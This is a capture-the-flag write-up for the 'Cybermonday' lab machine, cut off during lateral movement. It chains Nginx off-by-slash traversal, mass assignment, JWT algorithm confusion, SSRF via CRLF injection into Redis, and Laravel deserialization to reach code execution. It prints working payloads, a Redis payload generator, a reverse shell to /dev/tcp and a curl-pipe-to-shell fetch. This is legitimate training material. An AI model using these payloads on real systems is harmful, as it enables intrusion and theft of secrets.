Cybermonday

20th November 2023 / Document No D23.100.256

Prepared By: dotguy

Machine Author: Tr1s0n

Difficulty: Hard

Synopsis
Cybermonday is a hard difficulty Linux machine that showcases vulnerabilities such as off-by-slash, mass
assignment, and Server-Side Request Forgery (SSRF). The initial foothold involves exploiting a mass
assignment vulnerability in the web application and executing Redis commands through SSRF using CRLF
injection. For lateral movement, the source code of the API is analyzed, followed by exploiting an LFI
vulnerability to retrieve the password for the user john . Privilege escalation to root is achieved by
leveraging sudo privileges that allow the user john to build and run a Docker container from an arbitrary
Docker Compose file.

Skills required
Web Enumeration

Linux Fundamentals

Source code analysis

Redis

Skills learned
Cookie Manipulation

LFI

Exploiting SSRF

CRLF injection

Docker

Enumeration
Nmap
Let's run an Nmap scan to discover any open ports on the remote host.

nmap -p- --min-rate=1000 -sV 10.10.11.228

Starting Nmap 7.94 ( https://nmap.org )


Nmap scan report for 10.10.11.228
Host is up (0.080s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open http nginx 1.25.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

An initial Nmap scan reveals an SSH service on port 22 and an Nginx server on port 80 .

HTTP
Upon browsing to port 80 , we are redirected to the domain cybermonday.htb .
Let's add an entry for cybermonday.htb in our /etc/hosts file with the corresponding IP address to
resolve the domain name and allow us to access it in our browser.

echo "10.10.11.228 cybermonday.htb" | sudo tee -a /etc/hosts

Upon visiting cybermonday.htb in the browser, we are greeted with the homepage of the "Cybermonday"
web application, which appears to be an e-commerce website.
It also has the option to log in at /login .
We can enumerate the cybermonday.htb domain to reveal any hidden sub-directories. One way to do this
is by using the wfuzz tool, which can be installed on Ubuntu using the following command:

sudo apt install wfuzz

This wordlist by SecLists can be utilised for our fuzzing objectives. We will be using the following flags with
wfuzz .

-c : to get colored output

-w : to specify the wordlist

-u : to specify the URL

--hl : to hide the result entries that have the specified number of lines in the response

wfuzz -c -w /usr/share/wordlists/seclists/common.txt -u http://cybermonday.htb/FUZZ --hl 32

The above findings indicate that, among a few other endpoints, the only directory present on the website is
assets .

Let's explore the /dashboard endpoint, considering that it returns an HTTP 500 status code.
We encounter an error page resembling the one generated by the PHP framework Laravel , which we keep
in mind for further enumeration.

Now, let us sign up at /signup to explore the application's functionality.


After user registration, we have access to the user dashboard.

Clicking on the "View profile" button, we see a page that shows us our profile information and also allows us
to edit it.

Foothold
The Nmap scan identified that the web application is using an Nginx server on port 80 . It can also be
verified by reading the HTTP response headers.

curl -I cybermonday.htb

HTTP/1.1 200 OK
Server: nginx/1.25.1
Content-Type: text/html; charset=UTF-8
Connection: keep-alive

[* SNIP *]

When we encounter an Nginx web server, it is wise to check for the "off-by-slash" vulnerability. In Nginx, it is
possible to configure an alias to simplify the process of accessing specific files.

location /assets {
    alias /home/user/assets/;
}

With this configuration, we can send a request to /assets/img/image.jpg and the server will serve the file
/home/user/assets/img/image.jpg , due to the alias directive. However, due to the missing trailing / in
the location directive ( /assets instead of /assets/ ), issuing a request to /assets../.ssh/id_rsa
prompts the server to provide the file /home/user/assets/../.ssh/id_rsa , as the ../.ssh/id_rsa part is
considered a remainder and therefore appended to the alias.

As we saw in the fuzzing step, there is only the /assets directory on the server, so we can test off-by-slash
there.
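
A quick way to check the behaviour is to compare the status codes returned for a traversal path against those of normal and non-existent paths. A minimal sketch using Python requests (the probe paths are illustrative):

import requests

base = "http://cybermonday.htb"

# A 404 on /assets../ would mean the path is not resolved at all, while any other
# status (e.g. 403) suggests the traversal reaches a real directory on disk.
for path in ["/assets/", "/assets../", "/nonexistent../"]:
    r = requests.get(base + path, allow_redirects=False)
    print(path, r.status_code)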

The application responds with a status code of 403 , which signifies that the requested action is forbidden
or access is denied. Since we do not get a 404 , the attack has potentially succeeded.

Let's attempt to uncover files in the parent directory of the assets directory through fuzzing.

wfuzz -c -w /usr/share/SecLists/Discovery/Web-Content/quickhits.txt -u http://cybermonday.htb/assets../FUZZ --hc 404

<...SNIP...>
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000074: 200 18 L 34 W 258 Ch "/.editorconfig"
000000070: 200 0 L 1 W 10 Ch "/.dockerignore"
000000081: 200 57 L 47 W 1081 Ch "/.env"
000000106: 301 7 L 11 W 169 Ch "/.git"
000000117: 200 10 L 16 W 152 Ch "/.gitattributes"
000000114: 301 7 L 11 W 169 Ch "/.git/logs/refs"
000000113: 200 1 L 9 W 147 Ch "/.git/logs/HEAD"
000000111: 200 75 L 326 W 11991 Ch "/.git/index"
000000108: 403 7 L 9 W 153 Ch "/.git/"
000000109: 200 5 L 13 W 92 Ch "/.git/config"
000000110: 200 1 L 2 W 23 Ch "/.git/HEAD"
000000112: 403 7 L 9 W 153 Ch "/.git/logs/"
000000119: 200 14 L 14 W 179 Ch "/.gitignore"
000000897: 200 64 L 126 W 1813 Ch "/composer.json"
000000898: 200 7875 L 14819 W 288024 Ch "/composer.lock"
000000954: 403 7 L 9 W 153 Ch "/config/"
000001060: 301 7 L 11 W 169 Ch "/database"
000001074: 403 7 L 9 W 153 Ch "/database/"
000001135: 200 25 L 56 W 435 Ch "/Dockerfile"
000001681: 200 18 L 43 W 473 Ch "/package.json"
000001901: 200 31 L 62 W 1175 Ch "/phpunit.xml"
000001965: 200 64 L 348 W 3958 Ch "/README.md"

The files found by wfuzz indicate that the path traversal lands us in the root folder of the application.
Crucially, we discover the .env file, which typically contains secrets and other configuration
parameters passed as environment variables.

We download the file using cURL .

curl "http://cybermonday.htb/assets../.env"

APP_NAME=CyberMonday
APP_ENV=local
APP_KEY=base64:EX3zUxJkzEAY2xM4pbOfYMJus+bjx6V25Wnas+rFMzA=
APP_DEBUG=true
APP_URL=http://cybermonday.htb

LOG_CHANNEL=stack
LOG_DEPRECATIONS_CHANNEL=null
LOG_LEVEL=debug

DB_CONNECTION=mysql
DB_HOST=db
DB_PORT=3306
DB_DATABASE=cybermonday
DB_USERNAME=root
DB_PASSWORD=root

BROADCAST_DRIVER=log
CACHE_DRIVER=file

Fuzzing also revealed the presence of a .git directory, enabling us to clone the application to our local
machine using the git-dumper utility, which can be installed with the command pip3 install git-dumper .

git-dumper http://cybermonday.htb/assets../.git dump

Inspecting the composer.json file, we see that Laravel is at version 9.1.8 . This version has several known
gadget chains for insecure deserialization (usable with tools such as phpggc), but we do not yet have access
to our session contents to be able to exploit this vulnerability.

While reviewing the routes of the application, we can see that the /update route uses the
ProfileController controller in the file routes/web.php .

Examining the update method within the ProfileController controller in the file
app/Http/Controllers/ProfileController.php , it becomes apparent that it saves the request body in the
$data variable and subsequently uses it to update the user data. This approach might be susceptible to
mass assignment, as a user could submit extra request data, thereby modifying profile details that the
web application does not intend to be altered.
In Laravel, the $guarded property in a model specifies attributes that should not be mass assignable,
providing a security measure to control which model attributes can be updated using mass assignment.

The user model in the file app/Models/User.php shows that the $guarded property is set to protect only
the remember_token column. This implies that we can update any other information in our profile.
Within the database migrations in the file
database/migrations/2014_10_12_000000_create_users_table.php , it's evident that the user table
includes the isAdmin column.

We can modify its value to 1 , representing "True", thereby expanding our privileges within the application.

Exploiting Mass Assignment

To exploit the Mass Assignment vulnerability in the web application, let's intercept the web request for
updating the profile information in the Burp Suite proxy.

http://cybermonday.htb/home/profile

Add the isAdmin parameter to the request body and set its value to 1 .
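
The same request can also be replayed outside the proxy. Below is a minimal sketch with Python requests; the update route, the session cookie name, the CSRF token handling, and the other form fields are assumptions based on the source reviewed above, and only the extra isAdmin field matters for the attack:

import requests

s = requests.Session()
# Reuse the authenticated Laravel session cookie from the browser (cookie name assumed).
s.cookies.set("cybermonday_session", "<session cookie value>")

data = {
    "_token": "<CSRF token from the profile page>",   # Laravel forms require a CSRF token
    "name": "dotguy",                                  # existing profile fields (assumed)
    "email": "dotguy@mail.com",
    "isAdmin": 1,                                      # the mass-assigned column
}

r = s.post("http://cybermonday.htb/home/update", data=data, allow_redirects=False)
print(r.status_code)
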
Upon forwarding the altered web request, it becomes apparent that a "Dashboard" button is now visible in
the website's navbar, indicating that our user has acquired administrator permissions.

Enumerating the dashboard reveals a page located at /dashboard/changelog displaying the WebApp
changelog. Within this page, there is a hyperlink labeled "Webhook" leading to
http://webhooks-api-beta.cybermonday.htb/webhooks/fda96d32-e8c8-4301-8fb3-c821a316cf77 .

Let's add an entry for webhooks-api-beta.cybermonday.htb in our /etc/hosts file with the
corresponding IP address to be able to resolve the domain name.

echo "10.10.11.228 webhooks-api-beta.cybermonday.htb" | sudo tee -a /etc/hosts

Accessing webhooks-api-beta.cybermonday.htb reveals a list of API endpoints along with information
about each route's expected requests and corresponding parameters.

Let's also fuzz the webhooks-api-beta.cybermonday.htb domain to find any hidden endpoints or
sub-directories.

wfuzz -q -c -w /usr/share/wordlists/seclists/common.txt -u http://webhooks-api-beta.cybermonday.htb/FUZZ --hc 404

<...SNIP...>
000000024: 200 20 L 56 W 602 Ch ".htaccess"
000002374: 200 10 L 17 W 447 Ch "jwks.json"

The scanning process reveals the file jwks.json . This file typically contains a JSON Web Key Set (JWKS),
which is used in authentication processes, providing a set of public keys that can be used to verify the
authenticity of JSON Web Tokens (JWTs) in secure communication systems.

curl http://webhooks-api-beta.cybermonday.htb/jwks.json

Let's test the various API endpoints. We will be using Postman for API testing in this writeup. If we try to visit
the /webhooks endpoint, we receive a reply which says that we are unauthorized.

Thus, let us register ourselves as a user to be able to use other functionalities of the API. This can be done
by sending a POST request to the /auth/register endpoint.

Next, let's log in by sending a POST request to the /auth/login endpoint.


Upon a successful login, the server responds with a JWT token in the x-access-token header.
Consequently, it is essential to include this header in our subsequent requests to maintain authentication.
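
For reference, the registration and login flow can also be scripted; a minimal sketch with Python requests, where the credential field names are assumptions:

import requests

API = "http://webhooks-api-beta.cybermonday.htb"
creds = {"username": "dotguy", "password": "password123"}   # field names assumed

requests.post(f"{API}/auth/register", json=creds)
resp = requests.post(f"{API}/auth/login", json=creds)

# Per the note above, the JWT is returned in the x-access-token header.
token = resp.headers.get("x-access-token", "")

# Every subsequent request must carry the token.
print(requests.get(f"{API}/webhooks", headers={"x-access-token": token}).json())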

Now we can access the /webhooks endpoint, which provides a listing of the existing webhooks.

When we try to access routes that create or delete webhooks, we get an unauthorized message even
though we have our session token header in place.
This implies that our user is lacking certain privileges. Let us analyze the JWT session token using this
website.

It is using the RS256 algorithm, which employs asymmetric cryptography, indicating the use of two keys for
signature operations. By successfully exploiting this, we can alter our JWT role, potentially elevating our
privileges. Various attacks on JWT tokens using RS256 include algorithm confusion, wherein the JWT's
algorithm is manipulated from RS256 to HS256. In this attack, the token is signed with the public key, but
the application mistakenly treats it as if the public key were a secret key used in symmetric cryptography.

Executing this attack requires acquiring the public key used by the API for JWT token signing. During our
fuzzing phase, we identified the jwks.json file, which stores these public keys. In an algorithm confusion
attack, attackers modify the alg header in the JWT from RS256 to HS256 and sign the token with the public
key. The server, misled by the alg header, uses this same public key as if it were a symmetric secret key to
verify the token.

curl http://webhooks-api-beta.cybermonday.htb/jwks.json

{
"keys": [
{
"kty": "RSA",
"use": "sig",
"alg": "RS256",
"n": "pvezvAKCOgxwsiyV6PRJfGMul-
WBYorwFIWudWKkGejMx3onUSlM8OA3PjmhFNCP_8jJ7WA2gDa8oP3N2J8zFyadnrt2Xe59FdcLXTPxbbfFC0aTGkDI
OPZYJ8kR0cly0fiZiZbg4VLswYsh3Sn797IlIYr6Wqfc6ZPn1nsEhOrwO-qSD4Q24FVYeUxsn7pJ0oOWHPD-
qtC5q3BR2M_SxBrxXh9vqcNBB3ZRRA0H0FDdV6Lp_8wJY7RB8eMREgSe48r3k7GlEcCLwbsyCyhngysgHsq6yJYM82
BL7V8Qln42yij1BM7fCu19M1EZwR5eJ2Hg31ZsK5uShbITbRh16w",
"e": "AQAB"
}
]
}

The server returns a JSON object containing an array of keys, i.e. the JWKs. We can use this
website to transform the JWK into PEM format.
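
Alternatively, assuming the Python cryptography package is available, the same conversion can be done locally from the n and e values in the JWKS:

import base64, json
from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicNumbers
from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat

def b64url_to_int(value: str) -> int:
    value += "=" * (-len(value) % 4)          # restore base64 padding
    return int.from_bytes(base64.urlsafe_b64decode(value), "big")

jwk = json.load(open("jwks.json"))["keys"][0]
pub = RSAPublicNumbers(e=b64url_to_int(jwk["e"]), n=b64url_to_int(jwk["n"])).public_key()

with open("public.pem", "wb") as f:
    f.write(pub.public_bytes(Encoding.PEM, PublicFormat.SubjectPublicKeyInfo))

Either way, we obtain the following PEM-encoded public key.
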
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEApvezvAKCOgxwsiyV6PRJ
fGMul+WBYorwFIWudWKkGejMx3onUSlM8OA3PjmhFNCP/8jJ7WA2gDa8oP3N2J8z
Fyadnrt2Xe59FdcLXTPxbbfFC0aTGkDIOPZYJ8kR0cly0fiZiZbg4VLswYsh3Sn7
97IlIYr6Wqfc6ZPn1nsEhOrwO+qSD4Q24FVYeUxsn7pJ0oOWHPD+qtC5q3BR2M/S
xBrxXh9vqcNBB3ZRRA0H0FDdV6Lp/8wJY7RB8eMREgSe48r3k7GlEcCLwbsyCyhn
gysgHsq6yJYM82BL7V8Qln42yij1BM7fCu19M1EZwR5eJ2Hg31ZsK5uShbITbRh1
6wIDAQAB
-----END PUBLIC KEY-----

Store the public key in a file. Having the public key, we can utilize the jwt-tool utility to modify the
parameters of the JWT.
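
Under the hood, the forgery simply re-signs the downgraded token using the PEM bytes as an HMAC secret. A minimal sketch, assuming the key was saved as public.pem (note that the exact key bytes used as the secret, including any trailing newline, must match what the server loads, which is why an automated tool is convenient):

import base64, hashlib, hmac, json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

header = {"typ": "JWT", "alg": "HS256"}                       # downgraded from RS256
payload = {"id": 2, "username": "dotguy", "role": "admin"}    # role elevated to admin

signing_input = b64url(json.dumps(header, separators=(",", ":")).encode()) + "." + \
                b64url(json.dumps(payload, separators=(",", ":")).encode())

key = open("public.pem", "rb").read()                         # public key bytes as the HMAC secret
signature = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()

print(signing_input + "." + b64url(signature))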

Let us clone the jwt-tool repository.

git clone https://github.com/ticarpi/jwt_tool.git


To run the attack, use the following command and follow through the interactive prompt to change the
value of the role parameter to admin .

python3 jwt_tool/jwt_tool.py <your-jwt> -S hs256 -k <public-key-file> -T

python3 jwt_tool.py
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpZCI6MiwidXNlcm5hbWUiOiJkb3RndXkiLCJyb2xlIjoidXNlc
iJ9.Ubt_3Hnj8zcfHunbnznweczTBLGTCIvDu5HDM188ozOlfTX3gPrMA6-
Eu5g9MVAgOdB9k1lEz85N3h6_qk5ktSN9Wt6_0xuRX92K1X6sKIiqhy4p378mWosDzDr6sjzFGrIJwF3mwyZSg5pv6
h45YSjbFCks9LyaLD7VkNJZdFDfsYGK3wiRMWkLgXfgvpQ3x3KWSBiOK-
7WnZN6_XA6qBWnoRkTKzidUk23xsQ7QGJnhYhrSa5pzQJmJlwBDTweKUgzAKLWRX3UMme6SROQxdSoAnlVeCTel75N
JUvdr7I20vU-6eg_-eFldV2aJjx-AZHEc7JqBc8_SczQqWIuzw -S hs256 -k ../public.pem -T

<...SNIP...>
====================================================================
This option allows you to tamper with the header, contents and
signature of the JWT.
====================================================================

Token header values:


[1] typ = "JWT"
[2] alg = "RS256"
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[0] Continue to next step

Please select a field number:


(or 0 to Continue)
> 0

Token payload values:


[1] id = 2
[2] username = "dotguy"
[3] role = "user"
[4] *ADD A VALUE*
[5] *DELETE A VALUE*
[0] Continue to next step

Please select a field number:


(or 0 to Continue)
> 3

Current value of role is: user


Please enter new value and hit ENTER
> admin
[1] id = 2
[2] username = "dotguy"
[3] role = "admin"
[4] *ADD A VALUE*
[5] *DELETE A VALUE*
[0] Continue to next step

Please select a field number:


(or 0 to Continue)
> 0
jwttool_62700b77ef32858b0495145fb6d91948 - Tampered token - HMAC Signing:
[+]
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MiwidXNlcm5hbWUiOiJkb3RndXkiLCJyb2xlIjoiYWRta
W4ifQ.T2hoglH2xU_hXEPpy2WMv1ZXnI7avk53_IE5rSViVbs

Let us now use this modified JWT in the x-access-token header. We can now create a new webhook by
sending a POST request to /webhooks/create . We already know that this route expects 3 parameters:
name , description and action .

http://webhooks-api-beta.cybermonday.htb/webhooks/create

The response lists that there are two actions available for the webhook, namely "sendRequest" and
"createLogFile". Let us first create a webhook with the "sendRequest" action.
The API returns us a UUID to access this webhook. Let us now try to access this webhook.

The response states that the url parameter is missing in the request. Let us try to set up a Python HTTP
server locally and give our IP address in the url parameter to check whether the webhook is actually
executing the request.

Starting a Python HTTP server locally on port 8000 .

python3 -m http.server 8000

Send the request with our IP address in the url parameter.


We also need to define an HTTP method. Let us use GET and send the request.

We do receive a request on our local server.

python3 -m http.server 8000

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...


10.10.11.228 - - [22/Nov/2023 19:28:35] "GET / HTTP/1.1" 200 -

Earlier, we mentioned insecure deserialization in Laravel, but to exploit this vulnerability we need
access to the contents of our session. In the .env file, we see that Laravel uses Redis to store its sessions.

curl "http://cybermonday.htb/assets../.env"

<...SNIP...>
BROADCAST_DRIVER=log
CACHE_DRIVER=file
FILESYSTEM_DISK=local
QUEUE_CONNECTION=sync
SESSION_DRIVER=redis
SESSION_LIFETIME=120

MEMCACHED_HOST=127.0.0.1

REDIS_HOST=redis
REDIS_PASSWORD=
REDIS_PORT=6379
REDIS_PREFIX=laravel_session:
CACHE_PREFIX=
<...SNIP...>

REDIS_BLACKLIST=flushall,flushdb

In case the API has access to Redis, we could initiate requests using the "gopher" protocol to execute
commands within Redis. However, it is crucial to verify whether the API supports requests using the gopher
protocol.

Let's test the webhook request with gopher protocol.

The response makes it clear that the API doesn't support the gopher protocol.

Further testing of the method parameter leads us to discover that it is vulnerable to an HTTP request
smuggling attack via CRLF injection.

More information about this vulnerability can be found here.

We first start a Netcat listener on port 8000 .


nc -nlvp 8000

Then, we submit a request via the webhook, adding a \r\n sequence in the method parameter to
demonstrate the injection. The CRLF sequence here is key. It represents the carriage return ( \r ) and line
feed ( \n ) characters, which are used to start a new line in many text-based protocols, including HTTP.

GET\r\ninjected\r\n

After sending the malicious request, our listener receives the "injected" text after the GET method text.

nc -nvlp 8000

listening on [any] 8000 ...


connect to [10.10.14.27] from (UNKNOWN) [10.10.11.228] 38056
GET
injected
/ HTTP/1.1
Host: 10.10.14.27:8000
Accept: */*

The injected text "injected" appears on a new line, demonstrating that the CRLF sequence successfully
created a line break in the HTTP stream. This can potentially manipulate the behavior of the web server,
proxy, or other components in the HTTP communication chain.

With this vulnerability, we can modify the HTTP request to run commands inside Redis. We can refer to this
blog to better understand the crafting of the CRLF payloads.

Let us try to run the flushall command on Redis with this payload to verify Redis command execution.

"*1\r\n$8\r\nflushall\r\n*1\r\n$4\r\nquit\r\n"
Ideally, successful execution of the payload should result in us being logged out of the application. However,
upon reloading the page, it is evident that the payload did not have the desired effect. This is because the
.env file blacklists certain Redis operations, namely flushall and flushdb .

REDIS_BLACKLIST=flushall,flushdb

With command execution in Redis, we can inject an insecure deserialization payload into our session. For
that, we first need to list the Redis keys.

Let's use the following Python script to generate CRLF Redis command payloads.

#!/usr/bin/env python3
import urllib.parse
import sys
import json

def generate_payload(command):
    command = command.split(" ")
    payload = f"*{len(command)}\r\n"
    for word in command:
        payload += f"${len(word)}\r\n"
        payload += f"{word}\r\n"
    return payload

if __name__ == "__main__":
    if len(sys.argv) <= 1:
        print(f"/usr/bin/python3 {str(sys.argv[0])} <cmd>")
        exit(0)
    cmd = str(sys.argv[1])
    response = generate_payload(f"{cmd}")
    response += generate_payload("quit")
    output = json.dumps(response)
    print(output)
The script takes the Redis command to be executed as its only argument and prints the corresponding
CRLF payload. Let's try to list the Redis keys.

python3 generate_payload.py "keys *"

"*2\r\n$4\r\nkeys\r\n$1\r\n*\r\n*1\r\n$4\r\nquit\r\n"

We set the url parameter to redis:6379 , which we know from the previously discovered .env file. We
send the request with the generated payload in the method field.
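
Put together, the webhook call looks roughly like the following. This is a sketch: the UUID and JWT are placeholders, the url value uses the host and port from the .env file (a scheme prefix may be needed depending on how the API builds the request), and the payload is the output of generate_payload.py :

import requests

API = "http://webhooks-api-beta.cybermonday.htb"
uuid = "<uuid of our sendRequest webhook>"
token = "<forged admin JWT>"

# Output of: python3 generate_payload.py "keys *"
redis_payload = "*2\r\n$4\r\nkeys\r\n$1\r\n*\r\n*1\r\n$4\r\nquit\r\n"

r = requests.post(
    f"{API}/webhooks/{uuid}",
    headers={"x-access-token": token},
    json={"url": "redis:6379", "method": redis_payload},
)
print(r.status_code, r.text)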

It's observed that the application doesn't display the output of the executed command. Therefore, to
identify the key storing our session, we need to analyze how Laravel names keys in Redis. By default, Laravel
stores keys in Redis in the format: <redis_prefix>:<session_id> . To obtain the redis_prefix , we can
simply read the information from the .env file.

curl http://cybermonday.htb/assets../.env | grep REDIS

[** SNIP **]


REDIS_PREFIX=laravel_session:

We see that the Redis prefix is laravel_session: . Now, we need the session ID. Laravel uses AES-256-CBC
encryption by default to encrypt the session cookie. We can retrieve the session cookie by using the browser's
inspect element feature and going into the Storage tab.
Decode the base64 encoded cookie.

echo
"eyJpdiI6IlhXNWZJcit2RXRCUERrelBWU1VTTWc9PSIsInZhbHVlIjoiMDB4RGtIS2QzRTZQZEhpMmJsYlkxN1cxd
npaRXFTbGhvZjRQbzlwQ0NOd01oaHlrWE1kcHUxQUQ3WjhYbzA2eDlZNk93SEtkbW82SHJvNzhPdlRMSnNsSGU0SDh
Db2dRREI2L0tNbGZ3WkRkejIrMHUyMlEvS3p6OERwLzl3NzMiLCJtYWMiOiI3YmNjZjNjNGY5MmVhMzM3NzBjOTQ5Z
TUxZjE1MTk0MWNiYTc2MDgwYzk5OGY2OWIwNjE4MTgxZmVmYTJmM2FmIiwidGFnIjoiIn0=" | base64 -d

{"iv":"XW5fIr+vEtBPDkzPVSUSMg==","value":"00xDkHKd3E6PdHi2blbY17W1vzZEqSlhof4Po9pCCNwMhhyk
XMdpu1AD7Z8Xo06x9Y6OwHKdmo6Hro78OvTLJslHe4H8CogQDB6/KMlfwZDdz2+0u22Q/Kzz8Dp/9w73","mac":"7
bccf3c4f92ea33770c949e51f151941cba76080c998f69b0618181fefa2f3af","tag":""}

To decrypt this, we need the APP_KEY, which can be found in the .env file.

curl http://cybermonday.htb/assets../.env | grep APP_KEY

APP_KEY=base64:EX3zUxJkzEAY2xM4pbOfYMJus+bjx6V25Wnas+rFMzA=
[** SNIP **]

We can use the following PHP script to decrypt the session cookie and retrieve the session ID. It takes
command-line arguments for a session and an app key. It then decrypts an AES-256-CBC encrypted value
using the provided session data and app key, displaying the result.

<?php
if ($argc < 3) {
    echo "Use php " . $argv[0] . " <session> <app_key>";
    exit(1);
}

function decryptAesBase64($data, $key)
{
    return openssl_decrypt(base64_decode($data["value"]), "AES-256-CBC", base64_decode($key), OPENSSL_RAW_DATA, base64_decode($data["iv"]));
}

echo "\r\n";
echo decryptAesBase64(json_decode(base64_decode($argv[1]), true), $argv[2]) . PHP_EOL;

Execute the script, providing the session cookie and APP_KEY as arguments.
php decrypt.php
eyJpdiI6InhwcGNkTzBoRkhXSWZiaHBXallBcXc9PSIsInZhbHVlIjoiN3BHNk4yOHFKay90SmdHbmJ6QUV6SjVKRm
5xZzdJTHdwV1VMSi85WmxRZWdhdDdPQjFhY3RpS2RYS1l3d2NTR2tzRnhSYXMvQjlWblFLdTF2N3lZV3RYVDNPYWFM
OFEvNVRyVlM5NkFFa0lMZXV1K2MzQWJROUhLUVdldHVJZmciLCJtYWMiOiI5OTY2NWM3NGYzMzMzNWY3NzYxMTg5M2
YwOGYzYWUxYjk0NTc4NjZiNDAyNmU3MmFkMzU3M2E3ZmE3MjRlOWI2IiwidGFnIjoiIn0=
EX3zUxJkzEAY2xM4pbOfYMJus+bjx6V25Wnas+rFMzA=

25c6a7ecd50b519b7758877cdc95726f29500d4c|m9TPRhpAV5PKyb1GoSmIYVfpbz2EJM0p8txmY5f8

Having the session ID and the Redis prefix, we can write content into our session stored on Redis. Thus,
let's generate a payload to change the value of our session key.

python3 generate_payload.py "set laravel_session:DxtG33Khufei7bdfMXAyThXl6lbJucrJy7wXCh7 value_test"

"*3\r\n$3\r\nset\r\n$55\r\nlaravel_session:DxtG33Khufei7bdfMXAyThXl6lbJucrJy7wXCh7\r\n$10\
r\nvalue_test\r\n*1\r\n$4\r\nquit\r\n"

Send the request with the payload.

Upon attempting to access the web application, it becomes evident that Laravel produces an error message
during the unserialize process.
This implies that we have effectively modified the content of our session, allowing us to send a payload to
exploit insecure deserialization and achieve Remote Code Execution (RCE). We can use the phpggc utility to
generate a deserialization payload. First we clone the phpggc repository to our local machine.

git clone https://github.com/ambionics/phpggc.git

Various payloads in phpggc contain null bytes, which can potentially hinder exploitation. After testing
multiple payloads, it can be determined that "Laravel/RCE10" is free of null bytes, making it suitable for our
purposes.

Let's now try to generate a deserialization payload to execute the id system command.

./phpggc/phpggc Laravel/RCE10 system id

O:38:"Illuminate\Validation\Rules\RequiredIf":1:{s:9:"condition";a:2:
{i:0;O:28:"Illuminate\Auth\RequestGuard":3:
{s:8:"callback";s:14:"call_user_func";s:7:"request";s:6:"system";s:8:"provider";s:2:"id";}
i:1;s:4:"user";}}

Let's now generate a deserialization payload to execute the id system command and insert the payload
into our session. We can store the generated payload in a temporary file, and our Python script
generate_payload.py can be used to set this payload in the Redis session key.

phpggc/phpggc Laravel/RCE10 system "id" > /tmp/payload; python3 generate_payload.py "set laravel_session:m9TPRhpAV5PKyb1GoSmIYVfpbz2EJM0p8txmY5f8 $(cat /tmp/payload)"

"*3\r\n$3\r\nset\r\n$56\r\nlaravel_session:m9TPRhpAV5PKyb1GoSmIYVfpbz2EJM0p8txmY5f8\r\n$21
9\r\nO:38:\"Illuminate\\Validation\\Rules\\RequiredIf\":1:{s:9:\"condition\";a:2:
{i:0;O:28:\"Illuminate\\Auth\\RequestGuard\":3:
{s:8:\"callback\";s:14:\"call_user_func\";s:7:\"request\";s:6:\"system\";s:8:\"provider\";
s:2:\"id\";}i:1;s:4:\"user\";}}\r\n*1\r\n$4\r\nquit\r\n"
Send the request with the payload.

Upon refreshing the webpage, the output of the id command becomes visible, confirming the successful
execution of the command.

Let us now generate a bash reverse shell payload and save it as an index.html file.

echo "/bin/bash -c \"bash -i >& /dev/tcp/YOUR_IP/1337 0>&1\"" > index.html

Start a Python web server in the same directory as the index.html file.
python3 -m http.server 8001

We can use the curl utility to fetch the index.html file on the remote host and then pipe it to a shell for
execution. Let us generate a deserialization payload for the same. We will use ${IFS} instead of whitespace,
because the generate_payload.py script splits on spaces, making literal whitespace in the payload
impossible.

phpggc/phpggc Laravel/RCE10 system 'curl${IFS}<your-ip>:8001|sh' > /tmp/payload; python3 generate_payload.py "set <redis-key> $(cat /tmp/payload)"

Set up a Netcat listener on port 1337.

nc -nvlp 1337

Send the request and then reload the webpage. We successfully receive a reverse shell on our listener as
user www-data .

nc -nvlp 1337

listening on [any] 1337 ...


connect to [10.10.14.110] from (UNKNOWN) [10.10.11.228] 42944
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell

www-data@070370e2cdc4:~/html/public$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Issuing the following sequence of commands will give us a proper TTY session:

script /dev/null -c bash
export TERM=xterm
Ctrl+Z
stty raw -echo && fg

Lateral Movement
The hostname ( 070370e2cdc4 ) indicates that we are within a Docker container. We can inspect the
filesystem, listing the files mounted in the /mnt directory. By examining the contents of the file
/mnt/.ssh/authorized_keys , it becomes apparent that there is a user named john on the remote server.
www-data@070370e2cdc4:~$ cat /mnt/.ssh/authorized_keys

ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAACAQCy9ETY9f4YGlxIufnXgnIZGcV4pdk94RHW9DExKFNo7iEvAnjMFnyqzGOJQZ
623wqvm2WS577WlLFYTGVe4gVkV2LJm8NISndp9DG9l1y62o1qpXkIkYCsP0p87zcQ5MPiXhhVmBR3XsOd9MqtZ6uq
RiALj00qGDAc+hlfeSRFo3epHrcwVxAd41vCU8uQiAtJYpFe5l6xw1VGtaLmDeyektJ7QM0ayUHi0dlxcD8rLX+Btn
q/xzuoRzXOpxfJEMm93g+tk3sagCkkfYgUEHp6YimLUqgDNNjIcgEpnoefR2XZ8EuLU+G/4aSNgd03+q0gqsnrzX3S
yc5eWYyC4wZ93f++EePHoPkObppZS597JiWMgQYqxylmNgNqxu/1mPrdjterYjQ26PmjJlfex6/BaJWTKvJeHAemqi
57VkcwCkBA9gRkHi9SLVhFlqJnesFBcgrgLDeG7lzLMseHHGjtb113KB0NXm49rEJKe6ML6exDucGHyHZKV9zgzN9u
Y4ntp2T86uTFWSq4U2VqLYgg6YjEFsthqDTYLtzHer/8smFqF6gbhsj7cudrWap/Dm88DDa3RW3NBvqwHS6E9mJNYl
NtjiTXyV2TNo9TEKchSoIncOxocQv0wcrxoxSjJx7lag9F13xUr/h6nzypKr5C8GGU+pCu70MieA8E23lWtw==
john@cybermonday

We can check the IP address assigned to the container.

www-data@070370e2cdc4:~$ hostname -I

172.18.0.7

Let us scan the entire 172.18.0.0/24 subnet range to identify any other containers currently active on the
